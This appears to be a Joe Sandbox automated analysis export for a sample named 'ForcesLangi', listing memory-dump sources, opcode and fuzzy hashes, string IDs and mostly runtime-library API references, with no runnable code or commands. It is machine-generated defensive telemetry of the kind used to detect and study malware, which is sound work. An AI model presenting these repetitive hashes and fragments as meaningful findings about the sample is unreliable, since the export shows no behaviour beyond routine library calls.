                                                                                                                                                                                                                                              • Opcode ID: e1d2b16538e04cbe1fadafe67480b1fbf9d500f0cb5803a9a88e4ce23c257747
                                                                                                                                                                                                                                              • Instruction ID: 81f7361f69d96ef20b250b4a43511868426e99e3dc3a69ab47d65caee7970c6e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e1d2b16538e04cbe1fadafe67480b1fbf9d500f0cb5803a9a88e4ce23c257747
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F70207B6744A018FD7188F3CC5957C677F2BB87324F159A19C4A6CBFA4D626E40E8B80
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: vx[
                                                                                                                                                                                                                                              • API String ID: 0-1618767382
                                                                                                                                                                                                                                              • Opcode ID: 1489afea2681ca696c2cb5d755d06d6935a73beaeb55df8ceff4aa9f07c1c576
                                                                                                                                                                                                                                              • Instruction ID: 28d6666875bda9a0e5cc32b3fc97de76492f4320f238360a265584cc31a6c769
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1489afea2681ca696c2cb5d755d06d6935a73beaeb55df8ceff4aa9f07c1c576
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9AF1CF7AB442118FEF049E7CC9813EE77F2AB87364F2496199921D7794C23EC90A8F51
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID: =s[e
• API String ID: 0-287651873
APIs
• IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6CE2F0EE
Similarity
• API ID: FeaturePresentProcessor
• String ID:
• API String ID: 2325560087-0
Strings
Similarity
• API ID:
• String ID: 2N"
• API String ID: 0-3685128319
Strings
Similarity
• API ID:
• String ID: }Y#
• API String ID: 0-2128481213
Strings
Similarity
• API ID:
• String ID: "Btd
• API String ID: 0-1508767924
Strings
Similarity
• API ID:
• String ID: G/b
• API String ID: 0-808239343
                                                                                                                                                                                                                                              • Opcode ID: 33d24c1fad5914cb04170dc4a3aeb8981e9d822688fb18334b6928e5dae07548
                                                                                                                                                                                                                                              • Instruction ID: e177ae1424db7088a68f13ae4aff4418e32a3d55841e9f1f1474d553635276c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 33d24c1fad5914cb04170dc4a3aeb8981e9d822688fb18334b6928e5dae07548
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F991E276E88218CFCB04CFACD4846EDBBF1EF4A314F20411AE815EBB54C639984ACB51
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: f547f959b27c06655039c8a8ad0f327dd81c56d799695076bc5474da9712d268
                                                                                                                                                                                                                                              • Instruction ID: e8e71ce0fe27bc53756ed9cc8a0dda4d59cd3e678647c34def572c91f430bb10
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f547f959b27c06655039c8a8ad0f327dd81c56d799695076bc5474da9712d268
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA02FF76B0A5418FCF08CE6CD6953CD7BF6EB4B324F305525E415EBB95C22A8E0A8B50
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4d05f3161547d0f86dacd05d5480c4bba9fad306636e1469172cf2237754acc0
                                                                                                                                                                                                                                              • Instruction ID: 50cffe49788e9a9ed816ab7ac3ebe3081d7b32b313cf3adbe3f3b87cf2cd96d4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d05f3161547d0f86dacd05d5480c4bba9fad306636e1469172cf2237754acc0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76F1F137A81A118FDF08CE7CD5957DE77F2AB47328F20511AD910EBB94C22E8D0A8B50
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 2ca32240d799d11d9d8668690454f754892f44a526ea712ae968dfda176443e4
                                                                                                                                                                                                                                              • Instruction ID: 82f28cadf31a8fd1a89308f227c8c57e15d40f62e835685d291959833d6bbaac
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ca32240d799d11d9d8668690454f754892f44a526ea712ae968dfda176443e4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 85E1167AB456058FCF05CE7CC5957DE7BF2AB47324F209619D821EBB94C2268A0ACF11
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: bf3df671fdede12d5da4f913285b72e627b536e34854eb0e22eeb32a1b6ec5d2
                                                                                                                                                                                                                                              • Instruction ID: fe31ebb6dca9fdeb51bd7ea82bb6aa60a823dd2012831381e1ee44455045ec51
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf3df671fdede12d5da4f913285b72e627b536e34854eb0e22eeb32a1b6ec5d2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72C11576A446158FCF088E7CC4953CE7BF6EB5B324F245219D511EBB90C62E890A8F64
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 678e044bdef20015465c5ad5ee2fa5126ffe7e5fbea27a7f00757d36f34d7f34
                                                                                                                                                                                                                                              • Instruction ID: 51075d25316e3ea6fb176b0ed60f37c60b1a0e624ae12ec5f02a9bc68a72319e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 678e044bdef20015465c5ad5ee2fa5126ffe7e5fbea27a7f00757d36f34d7f34
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 56D1087AB196058FCF05CE7CD9957DE77F2AB4B328F244119D421E7B84C22A8A1ACB11
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: aa11d7d5566121d0a8349ada1fb2a4d392515e9d32fc75f73b8df7946fddc92c
                                                                                                                                                                                                                                              • Instruction ID: a1b77a159739929ffbde9a587f7b4dcee920c15210c51dc364d275f985fea528
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aa11d7d5566121d0a8349ada1fb2a4d392515e9d32fc75f73b8df7946fddc92c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EEC12536B446068FCB04CEBCC1957EE7BF2AB47354F20952AD411EB7D0D62A891B8BC5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5babf6e07308c742723f185b17711850184bda3c9c99173beabf698a9499d997
• Instruction ID: bc3c655670133d14c2d192e3e87bc62a8d653854d926b53e165715e04914d77d
• Opcode Fuzzy Hash: 5babf6e07308c742723f185b17711850184bda3c9c99173beabf698a9499d997
• Instruction Fuzzy Hash: ACA1037664A6468FCF048A7CC5D53DE3BF3AB43359F20551AD421DBF95C22A890ACB81
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                              • Instruction ID: 9ecac5bbc39ca4e45c1dde58d882cac89a1ebc9b005d3dc8d723831499b287ba
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1244d2490e722d8e2d4b08a687ba54e345a4788b81df14d6debf1e67a5b6da9d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FBE08C32912278EBCB11CB88C944A8AB7FCEB44B04B6140AAB555D3611C670EE00C7D0

Control-flow Graph (function starting at 6ce35400; rendered graph and executed/not-executed colouring not reproduced in text)

APIs
• ___free_lconv_mon.LIBCMT ref: 6CE35444
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37354
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37366
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37378
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3738A
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3739C
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373AE
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373C0
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373D2
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373E4
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE373F6
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE37408
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3741A
  • Part of subcall function 6CE37337: _free.LIBCMT ref: 6CE3742C
• _free.LIBCMT ref: 6CE35439
  • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
  • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
• _free.LIBCMT ref: 6CE3545B
• _free.LIBCMT ref: 6CE35470
• _free.LIBCMT ref: 6CE3547B
• _free.LIBCMT ref: 6CE3549D
• _free.LIBCMT ref: 6CE354B0
• _free.LIBCMT ref: 6CE354BE
• _free.LIBCMT ref: 6CE354C9
• _free.LIBCMT ref: 6CE35501
• _free.LIBCMT ref: 6CE35508
• _free.LIBCMT ref: 6CE35525
• _free.LIBCMT ref: 6CE3553D
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast___free_lconv_mon
• String ID:
• API String ID: 161543041-0
• Opcode ID: 7119f1d783f8dcc2cb7c90c677a98976e3151105aae4a7b3d48de7e0da83f330
• Instruction ID: 2be9316e68ee0aab52d90ec369f6ff8ef0f4fbadc1a0a278569700af7d319bf6
• Opcode Fuzzy Hash: 7119f1d783f8dcc2cb7c90c677a98976e3151105aae4a7b3d48de7e0da83f330
• Instruction Fuzzy Hash: 75318A31606260AFEB108A75D804B9673F9BF8031DF306419E49ED7B51DB31F948DB60

Control-flow Graph (function starting at 6ce32863; rendered graph and executed/not-executed colouring not reproduced in text)

APIs
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 98cef0cddb2d9a2bbac884f51803e4a934fb8a71c3dd38f9658b43591535e356
• Instruction ID: e14ac05b7ac6cf5cce95865c4d3a736f7f16b82e84b6d4f8b7372a726952d24d
• Opcode Fuzzy Hash: 98cef0cddb2d9a2bbac884f51803e4a934fb8a71c3dd38f9658b43591535e356
• Instruction Fuzzy Hash: 8321CB76A00118BFCB01DF94CC44DDD7BB8BF98248F105169F55ADBA22DB31EA48CB80

Control-flow Graph (function starting at 6ce30b00; rendered graph and executed/not-executed colouring not reproduced in text)

APIs
• _ValidateLocalCookies.LIBCMT ref: 6CE30B37
• ___except_validate_context_record.LIBVCRUNTIME ref: 6CE30B3F
• _ValidateLocalCookies.LIBCMT ref: 6CE30BC8
• __IsNonwritableInCurrentImage.LIBCMT ref: 6CE30BF3
• _ValidateLocalCookies.LIBCMT ref: 6CE30C48
Strings
Memory Dump Source
• Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
• Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
Similarity
• API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
• String ID: csm
• API String ID: 1170836740-1018135373
• Opcode ID: 4476adb15431670f57ef0e9f4e63d0246db99eed4a72024b2f223844a821f11e
• Instruction ID: e2313387b748a4828768098a687a869ff32837e823230e9ea5bbe5487530bc5a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4476adb15431670f57ef0e9f4e63d0246db99eed4a72024b2f223844a821f11e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641B634A011689FCF00CF69C884ADEBBB5AF4532CF34915AE81C9BB51D735BA46CB90
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                              • API String ID: 0-537541572
                                                                                                                                                                                                                                              • Opcode ID: 662713aa457b060bf2a5e4748e920f9f377c08fe1b1d6f289c0f758329c770a3
                                                                                                                                                                                                                                              • Instruction ID: 02404afaa5dd706c9e755597ad6b00afd795eea9158432bde14e7173a93898c5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 662713aa457b060bf2a5e4748e920f9f377c08fe1b1d6f289c0f758329c770a3
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2F21F931A49634A7CB219A258C44B4A3AB89F03768F312A12E91DAF790D671FC44C6D0
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CE3749E: _free.LIBCMT ref: 6CE374C3
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37524
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: HeapFree.KERNEL32(00000000,00000000,?,6CE321F9), ref: 6CE32CFD
                                                                                                                                                                                                                                                • Part of subcall function 6CE32CE7: GetLastError.KERNEL32(?,?,6CE321F9), ref: 6CE32D0F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3752F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3753A
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE3758E
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE37599
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE375A4
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 6CE375AF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
                                                                                                                                                                                                                                              • Instruction ID: 669f7a44da25c574f18ba41fd5e6d33bf8a8a5c3b107915212b49f364aaf5002
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7df7bc2e45ad0bb9c7f8bc702183ee147632bc2a3689b57671c2733396f6c7e8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 40114D32540F64F6D630AB70CD05FDB7BA86F41704F60581DA2DDA6A51DB35B90CC750
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE36637
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6CE3681C
                                                                                                                                                                                                                                              • __fassign.LIBCMT ref: 6CE36839
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,6CE34E19,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE36881
                                                                                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE368C1
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE36969
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1735259414-0
                                                                                                                                                                                                                                              • Opcode ID: 38039466c0b73660f1a57e8ca7f46a89ef8fa399549c65fc9ae0b6a0e6701fd2
                                                                                                                                                                                                                                              • Instruction ID: ba66bbe62bad3c05ea918ded2909810cb3d187b2e5704fdb8d5be96ee3142eec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 38039466c0b73660f1a57e8ca7f46a89ef8fa399549c65fc9ae0b6a0e6701fd2
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48C19175D012689FDF10CFA8C8809DDBBB9BF09318F28516AE859FB741D631A946CF60
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000001,?,6CE30CA5,6CE2ECE8,6CE2E6AF,?,6CE2E8E7,?,00000001,?,?,00000001,?,6CE3F8C8,0000000C,6CE2E9E0), ref: 6CE30FE5
                                                                                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE30FF3
                                                                                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE3100C
                                                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6CE2E8E7,?,00000001,?,?,00000001,?,6CE3F8C8,0000000C,6CE2E9E0,?,00000001,?), ref: 6CE3105E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1650765203.000000006CDF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CDF0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650749223.000000006CDF0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650809586.000000006CE3A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650827878.000000006CE41000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1650868274.000000006CE8F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6cdf0000_ForcesLangi.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3852720340-0
                                                                                                                                                                                                                                              • Opcode ID: baf2d368a663e3fd086bcce10756650e1262356d5b3c6b3ee5c8558503877a51
